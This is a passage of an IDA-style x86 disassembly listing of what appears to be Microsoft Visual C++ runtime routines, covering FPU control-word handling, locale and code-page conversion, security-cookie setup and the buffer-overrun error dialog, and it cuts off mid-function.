jnz short loc_41DB96
loc_41DB77: ; CODE XREF: sub_41DAEA+AA�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
shl edx, 1
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_41DB77
loc_41DB96: ; CODE XREF: sub_41DAEA+8B�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41DB9F: ; CODE XREF: sub_41DAEA+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DAEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DBA4 proc near ; CODE XREF: sub_419781+23�p
; sub_419891+22�p ...
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEB8
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41DAEA
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_41EBD1
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_2A]
mov [esi], eax
movsx eax, [ebp+var_2C]
mov [esi+4], eax
lea eax, [ebp+var_28]
push eax
push edi
call sub_419A70
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
call sub_41A026
pop edi
pop esi
leave
retn
sub_41DBA4 endp
; ---------------------------------------------------------------------------
push 2
call sub_4160D0
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_41DC1F proc near ; CODE XREF: sub_41DD3F+C�p
xor eax, eax
test bl, 1
jz short loc_41DC29
push 10h
pop eax
loc_41DC29: ; CODE XREF: sub_41DC1F+5�j
test bl, 4
jz short loc_41DC31
or eax, 8
loc_41DC31: ; CODE XREF: sub_41DC1F+D�j
test bl, 8
jz short loc_41DC39
or eax, 4
loc_41DC39: ; CODE XREF: sub_41DC1F+15�j
test bl, 10h
jz short loc_41DC41
or eax, 2
loc_41DC41: ; CODE XREF: sub_41DC1F+1D�j
test bl, 20h
jz short loc_41DC49
or eax, 1
loc_41DC49: ; CODE XREF: sub_41DC1F+25�j
test bl, 2
jz short loc_41DC53
or eax, 80000h
loc_41DC53: ; CODE XREF: sub_41DC1F+2D�j
push ebp
movzx edx, bx
push esi
mov ecx, edx
mov esi, 0C00h
and ecx, esi
push edi
mov edi, 300h
mov ebp, 200h
jz short loc_41DC8F
cmp ecx, 400h
jz short loc_41DC8A
cmp ecx, 800h
jz short loc_41DC86
cmp ecx, esi
jnz short loc_41DC8F
or eax, edi
jmp short loc_41DC8F
; ---------------------------------------------------------------------------
loc_41DC86: ; CODE XREF: sub_41DC1F+5D�j
or eax, ebp
jmp short loc_41DC8F
; ---------------------------------------------------------------------------
loc_41DC8A: ; CODE XREF: sub_41DC1F+55�j
or eax, 100h
loc_41DC8F: ; CODE XREF: sub_41DC1F+4D�j
; sub_41DC1F+61�j ...
and edx, edi
jz short loc_41DC9E
cmp edx, ebp
jnz short loc_41DCA3
or eax, 10000h
jmp short loc_41DCA3
; ---------------------------------------------------------------------------
loc_41DC9E: ; CODE XREF: sub_41DC1F+72�j
or eax, 20000h
loc_41DCA3: ; CODE XREF: sub_41DC1F+76�j
; sub_41DC1F+7D�j
test bh, 10h
pop edi
pop esi
pop ebp
jz short locret_41DCB0
or eax, 40000h
locret_41DCB0: ; CODE XREF: sub_41DC1F+8A�j
retn
sub_41DC1F endp
; =============== S U B R O U T I N E =======================================
sub_41DCB1 proc near ; CODE XREF: sub_41DD3F+22�p
xor eax, eax
test bl, 10h
jz short loc_41DCB9
inc eax
loc_41DCB9: ; CODE XREF: sub_41DCB1+5�j
test bl, 8
jz short loc_41DCC1
or eax, 4
loc_41DCC1: ; CODE XREF: sub_41DCB1+B�j
test bl, 4
jz short loc_41DCC9
or eax, 8
loc_41DCC9: ; CODE XREF: sub_41DCB1+13�j
test bl, 2
jz short loc_41DCD1
or eax, 10h
loc_41DCD1: ; CODE XREF: sub_41DCB1+1B�j
test bl, 1
jz short loc_41DCD9
or eax, 20h
loc_41DCD9: ; CODE XREF: sub_41DCB1+23�j
test ebx, 80000h
jz short loc_41DCE4
or eax, 2
loc_41DCE4: ; CODE XREF: sub_41DCB1+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_41DD18
cmp ecx, 100h
jz short loc_41DD13
cmp ecx, esi
jz short loc_41DD0C
cmp ecx, edx
jnz short loc_41DD18
or eax, 0C00h
jmp short loc_41DD18
; ---------------------------------------------------------------------------
loc_41DD0C: ; CODE XREF: sub_41DCB1+4E�j
or eax, 800h
jmp short loc_41DD18
; ---------------------------------------------------------------------------
loc_41DD13: ; CODE XREF: sub_41DCB1+4A�j
or eax, 400h
loc_41DD18: ; CODE XREF: sub_41DCB1+42�j
; sub_41DCB1+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_41DD2E
cmp ecx, 10000h
jnz short loc_41DD30
or eax, esi
jmp short loc_41DD30
; ---------------------------------------------------------------------------
loc_41DD2E: ; CODE XREF: sub_41DCB1+6F�j
or eax, edx
loc_41DD30: ; CODE XREF: sub_41DCB1+77�j
; sub_41DCB1+7B�j
test ebx, 40000h
pop esi
jz short locret_41DD3E
or eax, 1000h
locret_41DD3E: ; CODE XREF: sub_41DCB1+86�j
retn
sub_41DCB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD3F proc near ; CODE XREF: sub_41DD71+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
fstcw word ptr [ebp+var_4]
mov ebx, [ebp+var_4]
call sub_41DC1F
mov ebx, eax
mov eax, [ebp+arg_4]
not eax
and ebx, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or ebx, eax
call sub_41DCB1
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
mov eax, ebx
pop ebx
leave
retn
sub_41DD3F endp
; =============== S U B R O U T I N E =======================================
sub_41DD71 proc near ; CODE XREF: sub_4199EA+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_41DD3F
pop ecx
pop ecx
retn
sub_41DD71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD87 proc near ; CODE XREF: sub_419C39+27D�p
; sub_41C3E0+15E�p ...
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_42DEB8
xor eax, [ebp+4]
and [ebp+var_6], 0
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
call ds:dword_42011C ; GetLocaleInfoA
test eax, eax
jnz short loc_41DDB9
or eax, 0FFFFFFFFh
jmp short loc_41DDC3
; ---------------------------------------------------------------------------
loc_41DDB9: ; CODE XREF: sub_41DD87+2B�j
lea eax, [ebp+var_C]
push eax
call sub_41471A
pop ecx
loc_41DDC3: ; CODE XREF: sub_41DD87+30�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41A026
leave
retn
sub_41DD87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DDD0 proc near ; CODE XREF: sub_419C39+2A8�p
; sub_419C39+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_429AB0
call __SEH_prolog
mov eax, dword_42DEB8
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_20], edi
mov [ebp+var_24], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_41DF79
lea ecx, [ebp+var_40]
push ecx
push eax
mov esi, ds:dword_4201B0
call esi ; GetCPInfo
test eax, eax
jz short loc_41DE37
cmp [ebp+var_40], 1
jnz short loc_41DE37
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_41DE37
cmp [ebp+var_40], 1
jnz short loc_41DE37
mov [ebp+var_2C], 1
loc_41DE37: ; CODE XREF: sub_41DDD0+45�j
; sub_41DDD0+4B�j ...
cmp [ebp+var_2C], edi
jz short loc_41DE56
cmp ebx, 0FFFFFFFFh
jz short loc_41DE45
mov esi, ebx
jmp short loc_41DE51
; ---------------------------------------------------------------------------
loc_41DE45: ; CODE XREF: sub_41DDD0+6F�j
push [ebp+arg_8]
call sub_4177F0
pop ecx
mov esi, eax
inc esi
loc_41DE51: ; CODE XREF: sub_41DDD0+73�j
mov [ebp+var_44], esi
jmp short loc_41DE59
; ---------------------------------------------------------------------------
loc_41DE56: ; CODE XREF: sub_41DDD0+6A�j
mov esi, [ebp+var_44]
loc_41DE59: ; CODE XREF: sub_41DDD0+84�j
cmp [ebp+var_2C], edi
jnz short loc_41DE78
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_4200D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_44], esi
cmp esi, edi
jz short loc_41DED0
loc_41DE78: ; CODE XREF: sub_41DDD0+8C�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_41C380
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41DEBC
; ---------------------------------------------------------------------------
loc_41DEA5: ; DATA XREF: .rdata:stru_429AB0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41DEA9: ; DATA XREF: .rdata:stru_429AB0�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_44]
loc_41DEBC: ; CODE XREF: sub_41DDD0+D3�j
cmp ebx, edi
jnz short loc_41DEDE
push esi
push 2
call sub_41C0B0
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_41DED7
loc_41DED0: ; CODE XREF: sub_41DDD0+A6�j
xor eax, eax
jmp loc_41DF8B
; ---------------------------------------------------------------------------
loc_41DED7: ; CODE XREF: sub_41DDD0+FE�j
mov [ebp+var_24], 1
loc_41DEDE: ; CODE XREF: sub_41DDD0+EE�j
push esi
push ebx
push [ebp+var_28]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jz loc_41DF7C
cmp [ebp+arg_10], edi
jz short loc_41DF1E
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_4200D8 ; WideCharToMultiByte
test eax, eax
jz short loc_41DF7C
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
jmp short loc_41DF7C
; ---------------------------------------------------------------------------
loc_41DF1E: ; CODE XREF: sub_41DDD0+12C�j
cmp [ebp+var_2C], edi
jnz short loc_41DF39
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_4200D8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_41DF7C
loc_41DF39: ; CODE XREF: sub_41DDD0+151�j
push esi
push 1
call sub_41C0B0
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_41DF7C
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_4200D8 ; WideCharToMultiByte
cmp eax, edi
jnz short loc_41DF6C
push [ebp+var_20]
call sub_414844
pop ecx
mov [ebp+var_20], edi
jmp short loc_41DF7C
; ---------------------------------------------------------------------------
loc_41DF6C: ; CODE XREF: sub_41DDD0+18C�j
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_41DF7C
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_41DF7C
; ---------------------------------------------------------------------------
loc_41DF79: ; CODE XREF: sub_41DDD0+30�j
mov ebx, [ebp+var_48]
loc_41DF7C: ; CODE XREF: sub_41DDD0+123�j
; sub_41DDD0+144�j ...
cmp [ebp+var_24], edi
jz short loc_41DF88
push ebx
call sub_414844
pop ecx
loc_41DF88: ; CODE XREF: sub_41DDD0+1AF�j
mov eax, [ebp+var_20]
loc_41DF8B: ; CODE XREF: sub_41DDD0+102�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41A026
call __SEH_epilog
retn
sub_41DDD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF9F proc near ; DATA XREF: .data:0042B004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_42015C ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_4200F8 ; GetCurrentProcessId
xor esi, eax
call ds:dword_420174 ; GetCurrentThreadId
xor esi, eax
call ds:dword_420004 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_42DEB8, esi
jnz short loc_41DFF2
mov dword_42DEB8, 0BB40E64Eh
loc_41DFF2: ; CODE XREF: sub_41DF9F+47�j
pop esi
leave
retn
sub_41DF9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DFF5 proc near ; CODE XREF: sub_41A026-1D�p
var_140 = dword ptr -140h
var_128 = byte ptr -128h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset stru_429C60
call __SEH_prolog
mov eax, dword_42DEB8
xor eax, [ebp+4]
mov [ebp+var_1C], eax
mov eax, dword_47C524
xor ecx, ecx
cmp eax, ecx
jz short loc_41E039
mov [ebp+ms_exc.disabled], ecx
push [ebp+arg_4]
push [ebp+arg_0]
call eax
pop ecx
pop ecx
loc_41E027: ; CODE XREF: sub_41DFF5+42�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_41E137
; ---------------------------------------------------------------------------
loc_41E030: ; DATA XREF: .rdata:stru_429C60�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41E034: ; DATA XREF: .rdata:stru_429C60�o
mov esp, [ebp+ms_exc.old_esp]
jmp short loc_41E027
; ---------------------------------------------------------------------------
loc_41E039: ; CODE XREF: sub_41DFF5+23�j
mov eax, [ebp+arg_0]
dec eax
jz short loc_41E052
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov [ebp+var_20], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_41E063
; ---------------------------------------------------------------------------
loc_41E052: ; CODE XREF: sub_41DFF5+48�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov [ebp+var_20], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_41E063: ; CODE XREF: sub_41DFF5+5B�j
mov [ebp+var_24], cl
push 104h
lea eax, [ebp+var_128]
push eax
push ecx
call ds:dword_420010 ; GetModuleFileNameA
test eax, eax
jnz short loc_41E090
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp+var_128]
push eax
call sub_419A70
pop ecx
pop ecx
loc_41E090: ; CODE XREF: sub_41DFF5+86�j
lea ebx, [ebp+var_128]
lea eax, [ebp+var_128]
push eax
call sub_4177F0
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_41E0D4
lea eax, [ebp+var_128]
push eax
call sub_4177F0
mov ebx, eax
lea eax, [ebp+var_128]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_4144A0
add esp, 10h
loc_41E0D4: ; CODE XREF: sub_41DFF5+B4�j
push ebx
call sub_4177F0
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
push edi
push esi
call sub_419A70
mov edi, offset asc_4298C0 ; "\n\n"
push edi
push esi
call sub_419A80
push offset dword_429ABC
push esi
call sub_419A80
push ebx
push esi
call sub_419A80
push edi
push esi
call sub_419A80
push [ebp+var_20]
push esi
call sub_419A80
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_41E283
add esp, 3Ch
loc_41E137: ; CODE XREF: sub_41DFF5+36�j
push 3
call sub_415ED4
int 3 ; Trap to Debugger
loc_41E13F: ; DATA XREF: sub_41E185�o
; .data:0042DEBC�o
push esi
mov esi, [esp+148h+var_140]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41E162
cmp dword ptr [eax+10h], 3
jnz short loc_41E162
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41E162
call sub_41A89F
loc_41E162: ; CODE XREF: sub_41DFF5+157�j
; sub_41DFF5+15D�j ...
mov eax, dword_47C528
test eax, eax
jz short loc_41E17F
push eax
call sub_41E1DD
test eax, eax
pop ecx
jz short loc_41E17F
push esi
call dword_47C528
jmp short loc_41E181
; ---------------------------------------------------------------------------
loc_41E17F: ; CODE XREF: sub_41DFF5+174�j
; sub_41DFF5+17F�j
xor eax, eax
loc_41E181: ; CODE XREF: sub_41DFF5+188�j
pop esi
retn 4
sub_41DFF5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E185 proc near ; DATA XREF: .data:0042B01C�o
push offset loc_41E13F
call ds:dword_420144 ; SetUnhandledExceptionFilter
mov dword_47C528, eax
xor eax, eax
retn
sub_41E185 endp
; =============== S U B R O U T I N E =======================================
sub_41E198 proc near ; DATA XREF: .data:0042B034�o
push dword_47C528
call ds:dword_420144 ; SetUnhandledExceptionFilter
retn
sub_41E198 endp
; =============== S U B R O U T I N E =======================================
sub_41E1A5 proc near ; CODE XREF: sub_41A378+53�p
; sub_41A378+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_420140 ; IsBadReadPtr
test eax, eax
jz short loc_41E1BD
xor esi, esi
loc_41E1BD: ; CODE XREF: sub_41E1A5+14�j
mov eax, esi
pop esi
retn
sub_41E1A5 endp
; =============== S U B R O U T I N E =======================================
sub_41E1C1 proc near ; CODE XREF: sub_41A378+65�p
; sub_41A378+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_420194 ; IsBadWritePtr
test eax, eax
jz short loc_41E1D9
xor esi, esi
loc_41E1D9: ; CODE XREF: sub_41E1C1+14�j
mov eax, esi
pop esi
retn
sub_41E1C1 endp
; =============== S U B R O U T I N E =======================================
sub_41E1DD proc near ; CODE XREF: sub_41A378+128�p
; sub_41DFF5+177�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
call ds:dword_42013C ; IsBadCodePtr
test eax, eax
jz short loc_41E1F1
xor esi, esi
loc_41E1F1: ; CODE XREF: sub_41E1DD+10�j
mov eax, esi
pop esi
retn
sub_41E1DD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A89F
loc_41E1F5: ; CODE XREF: sub_41A89F:loc_41A8CF�j
push 0Ah
call sub_41B3F9
push 16h
call sub_41EE93
pop ecx
pop ecx
push 3
call sub_415ED4
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41A89F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E20D proc near ; CODE XREF: sub_41AFFE+7�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_429C70
call __SEH_prolog
cmp dword_47C9A0, 3
jnz short loc_41E25C
push 4
call sub_4180B5
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
push esi
call sub_41812E
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_41E24A
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_41E24D
; ---------------------------------------------------------------------------
loc_41E24A: ; CODE XREF: sub_41E20D+30�j
mov esi, [ebp+var_20]
loc_41E24D: ; CODE XREF: sub_41E20D+3B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E27A
cmp [ebp+var_1C], 0
jnz short loc_41E26F
loc_41E25C: ; CODE XREF: sub_41E20D+13�j
push [ebp+arg_0]
push 0
push dword_47C99C
call ds:dword_420138 ; RtlSizeHeap
mov esi, eax
loc_41E26F: ; CODE XREF: sub_41E20D+4D�j
mov eax, esi
call __SEH_epilog
retn
sub_41E20D endp
; =============== S U B R O U T I N E =======================================
sub_41E277 proc near ; DATA XREF: .rdata:stru_429C70�o
mov esi, [ebp-20h]
sub_41E277 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E27A proc near ; CODE XREF: sub_41E20D+44�p
push 4
call sub_418021
pop ecx
retn
sub_41E27A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E283 proc near ; CODE XREF: sub_41B3F9+132�p
; sub_41DFF5+13A�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_47C52C, ebx
push esi
push edi
jnz short loc_41E303
push offset aUser32_dll ; "user32.dll"
call ds:dword_420088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_41E33E
mov esi, ds:dword_420084
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_47C52C, eax
jz short loc_41E33E
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_47C530, eax
call esi ; GetProcAddress
cmp dword_47C1C4, 2
mov dword_47C534, eax
jnz short loc_41E303
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_47C53C, eax
jz short loc_41E303
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_47C538, eax
loc_41E303: ; CODE XREF: sub_41E283+11�j
; sub_41E283+60�j ...
mov eax, dword_47C538
test eax, eax
jz short loc_41E348
call eax
test eax, eax
jz short loc_41E32F
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_47C53C
test eax, eax
jz short loc_41E32F
test [ebp+var_8], 1
jnz short loc_41E348
loc_41E32F: ; CODE XREF: sub_41E283+8D�j
; sub_41E283+A4�j
cmp dword_47C1D0, 4
jb short loc_41E342
or [ebp+arg_A], 20h
jmp short loc_41E367
; ---------------------------------------------------------------------------
loc_41E33E: ; CODE XREF: sub_41E283+22�j
; sub_41E283+3D�j
xor eax, eax
jmp short loc_41E377
; ---------------------------------------------------------------------------
loc_41E342: ; CODE XREF: sub_41E283+B3�j
or [ebp+arg_A], 4
jmp short loc_41E367
; ---------------------------------------------------------------------------
loc_41E348: ; CODE XREF: sub_41E283+87�j
; sub_41E283+AA�j
mov eax, dword_47C530
test eax, eax
jz short loc_41E367
call eax
mov ebx, eax
test ebx, ebx
jz short loc_41E367
mov eax, dword_47C534
test eax, eax
jz short loc_41E367
push ebx
call eax
mov ebx, eax
loc_41E367: ; CODE XREF: sub_41E283+B9�j
; sub_41E283+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_47C52C
loc_41E377: ; CODE XREF: sub_41E283+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E283 endp
; =============== S U B R O U T I N E =======================================
sub_41E37C proc near ; CODE XREF: sub_41E3AD+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_47C761[eax], cl
jnz short loc_41E3A9
cmp [esp+arg_4], 0
jz short loc_41E3A2
movzx eax, ds:word_4290B2[eax*2]
and eax, [esp+arg_4]
jmp short loc_41E3A4
; ---------------------------------------------------------------------------
loc_41E3A2: ; CODE XREF: sub_41E37C+16�j
xor eax, eax
loc_41E3A4: ; CODE XREF: sub_41E37C+24�j
test eax, eax
jnz short loc_41E3A9
retn
; ---------------------------------------------------------------------------
loc_41E3A9: ; CODE XREF: sub_41E37C+F�j
; sub_41E37C+2A�j
xor eax, eax
inc eax
retn
sub_41E37C endp
; =============== S U B R O U T I N E =======================================
sub_41E3AD proc near ; CODE XREF: sub_41B70D+35�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_41E37C
add esp, 0Ch
retn
sub_41E3AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E3BE proc near ; CODE XREF: sub_41BD6B+54�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_41CB4B
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_41E3EF
call sub_419430
mov dword ptr [eax], 9
jmp short loc_41E418
; ---------------------------------------------------------------------------
loc_41E3EF: ; CODE XREF: sub_41E3BE+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_420090 ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_41E41E
call ds:dword_420008 ; RtlGetLastWin32Error
test eax, eax
jz short loc_41E41E
push eax
call sub_419442
pop ecx
loc_41E418: ; CODE XREF: sub_41E3BE+2F�j
mov eax, edi
mov edx, edi
jmp short loc_41E43D
; ---------------------------------------------------------------------------
loc_41E41E: ; CODE XREF: sub_41E3BE+47�j
; sub_41E3BE+51�j
mov eax, esi
sar eax, 5
mov eax, dword_47C640[eax*4]
and esi, 1Fh
lea ecx, [esi+esi*8]
lea eax, [eax+ecx*4+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_41E43D: ; CODE XREF: sub_41E3BE+5E�j
pop edi
pop esi
leave
retn
sub_41E3BE endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
mov al, 0FFh
mov edi, edi
loc_41E460: ; CODE XREF: .text:0041E470�j
; .text:0041E490�j
or al, al
jz short loc_41E496
mov al, [esi]
add esi, 1
mov ah, [edi]
add edi, 1
cmp ah, al
jz short loc_41E460
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_41E460
sbb al, al
sbb al, 0FFh
loc_41E496: ; CODE XREF: .text:0041E462�j
movsx eax, al
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E49E proc near ; CODE XREF: sub_41D38D+2BD�p
var_100C = byte ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_414630
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
push esi
push 1
xor esi, esi
push esi
push [ebp+arg_0]
mov [ebp+var_4], eax
call sub_41B178
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_41E5C8
push 2
push esi
push [ebp+arg_0]
call sub_41B178
add esp, 0Ch
cmp eax, ebx
jz loc_41E5C8
